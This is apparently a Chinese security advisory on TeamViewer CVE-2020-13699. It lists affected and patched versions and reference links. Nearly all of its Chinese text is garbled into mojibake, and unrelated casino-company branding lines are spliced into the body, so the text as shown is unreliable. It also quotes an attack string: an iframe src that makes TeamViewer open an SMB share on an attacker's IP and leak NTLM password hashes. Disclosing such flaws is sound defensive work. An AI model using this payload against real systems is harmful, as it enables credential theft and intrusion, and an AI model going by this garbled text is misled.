CVE-2020-13699 | TeamViewer°²È«·ì϶¹«¸æ

°ä²¼¹¦·ò 2020-08-09

0x00 ·ì϶¸ÅÊö


CVE   ID
CVE-2020-13699
ʱ    ¼ä
2020-08-09
Àà    ÐÍ

µÈ    ¼¶
¸ßΣ
Ô¶³ÌÀûÓÃ
ÊÇ
Ó°ÏìÁìÓò
TeamViewer 8,9, 10,11,12,13,14,15°æ±¾

0x01 ·ì϶ÏêÇé


8827Ì«Ñô¼¯ÍÅ(Macau)¹É·ÝÓÐÏÞ¹«Ë¾-Official website


½üÈÕ£¬£¬£¬£¬£¬£¬£¬£¬TeamViewer°ä²¼°²È«²¼¸æ£¬£¬£¬£¬£¬£¬£¬£¬½¨¸´ÁËÒ»¸ö·ì϶£¨CVE-2020-13699£©¡£¡£¡£¡£¡£¸Ã·ì϶ԴÓÚ·¨Ê½ÎÞ·¨ÕýÈ·ÒýÓÃÆä×Ô½ç˵URI´¦Ö÷¨Ê½£¬£¬£¬£¬£¬£¬£¬£¬µ¼Ö¹¥»÷Õß¿ÉÆð¶¯TeamViewer²¢Ö´ÐÐËÁÒâ´úÂë»ò»ñµÃÃÜÂë¹þÏ£¡£¡£¡£¡£¡£

ÒªÀûÓø÷ì϶£¬£¬£¬£¬£¬£¬£¬£¬Óû§±ØÒªä¯ÀÀµ½Ò»¸ö¶ñÒâÒ³Ãæ£¬£¬£¬£¬£¬£¬£¬£¬¸Ã¶ñÒâÒ³Ãæ»áÔÚÆäWebä¯ÀÀÆ÷ÖмÓÔØiframe¡£¡£¡£¡£¡£¹¥»÷Õ߻ὫiframeµÄsrc ÊôÐÔÉèÖÃΪ

'teamviewer10£º--play \\ attacker-IP \ share \ fake.tvs'


8827Ì«Ñô¼¯ÍÅ(Macau)¹É·ÝÓÐÏÞ¹«Ë¾-Official website


´ËºÅÁʾ±¾µØ×°ÖõÄTeamViewerÀûÓ÷¨Ê½Í¨¹ý·þÎñÆ÷ÐÂÎſ飨SMB£©ºÍ̸Ïνӵ½¹¥»÷ÕߵķþÎñÆ÷¡£¡£¡£¡£¡£ ¹¥»÷ÕßʹÓþ«ÐÄÔì×÷µÄURL½«¶ñÒâiframeǶÈëÍøÕ¾ÖУ¬£¬£¬£¬£¬£¬£¬£¬¸ÃURL »áÆô¶¯TeamViewer Windows×ÀÃæ¿Í»§¶Ë²¢ÆÈʹÆä´ò¿ªÔ¶³ÌSMB¹²Ïí¡£¡£¡£¡£¡£

ÓÉÒò¶øÊܺ¦ÕßµÄÍÆËã»úÌáÒéÓë¹¥»÷ÕßµÄSMB¹²ÏíÏνӣ¬£¬£¬£¬£¬£¬£¬£¬Òò¶ø¹¥»÷Õß²»±ØÒªÖªÂ·Óû§µÄÃÜÂ룬£¬£¬£¬£¬£¬£¬£¬¿É×Ô¶¯Í¨¹ýÉí·ÝÑéÖ¤²¢»ñµÃ½Ó¼ûȨÏÞ¡£¡£¡£¡£¡£

×êÑÐÈËÔ±°µÊ¾£º¡°WindowsÔÚ´ò¿ªSMB¹²Ïíʱ½«Ö´ÐÐNTLMÉí·ÝÑéÖ¤£¬£¬£¬£¬£¬£¬£¬£¬²¢ÇÒÄܹ»×ª·¢¸ÃÒªÇóÒÔÖ´ÐдúÂë¡£¡£¡£¡£¡£¡¹Øâ»áÓ°ÏìURI´¦Ö÷¨Ê½teamviewer10¡¢teamviewer8¡¢teamviewerapi¡¢tvchat1¡¢tvcontrol1¡¢tvfiletransfer1¡¢tvjoinv8¡¢tvpresent1¡¢tvsendfile1¡¢tvsqcustomer1¡¢tvsqsupport1¡¢tvvideocall1ºÍtvvpn1¡£¡£¡£¡£¡£


0x02 ´ëÖý¨Òé


Ŀǰ³§ÉÌÒѰ䲼²¹¶¡£¡£¡£¡£¡£¬£¬£¬£¬£¬£¬£¬£¬WindowsµÄTeamViewerÓû§Ó¦ÊÔÂÇÉý¼¶µ½Ðµķ¨Ê½°æ±¾£¬£¬£¬£¬£¬£¬£¬£¬ÆäÖÐÔ̺¬£º8.0.258861¡¢9.0.28860¡¢10.0.258873¡¢11.0.258870¡¢12.0.258869¡¢13.2.36220¡¢14.2.56676¡¢14.7.48350¡¢15.8.3¡£¡£¡£¡£¡£ÏÂÔØÁ´½Ó£º

https://www.teamviewer.cn/cn/download/windows/


0x03 ÓйØÐÂÎÅ


https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/


0x04 ²Î¿¼Á´½Ó


https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448


0x05 ¹¦·òÏß


2020-08-09 VSRC°ä²¼·ì϶¹«¸æ



8827Ì«Ñô¼¯ÍÅ(Macau)¹É·ÝÓÐÏÞ¹«Ë¾-Official website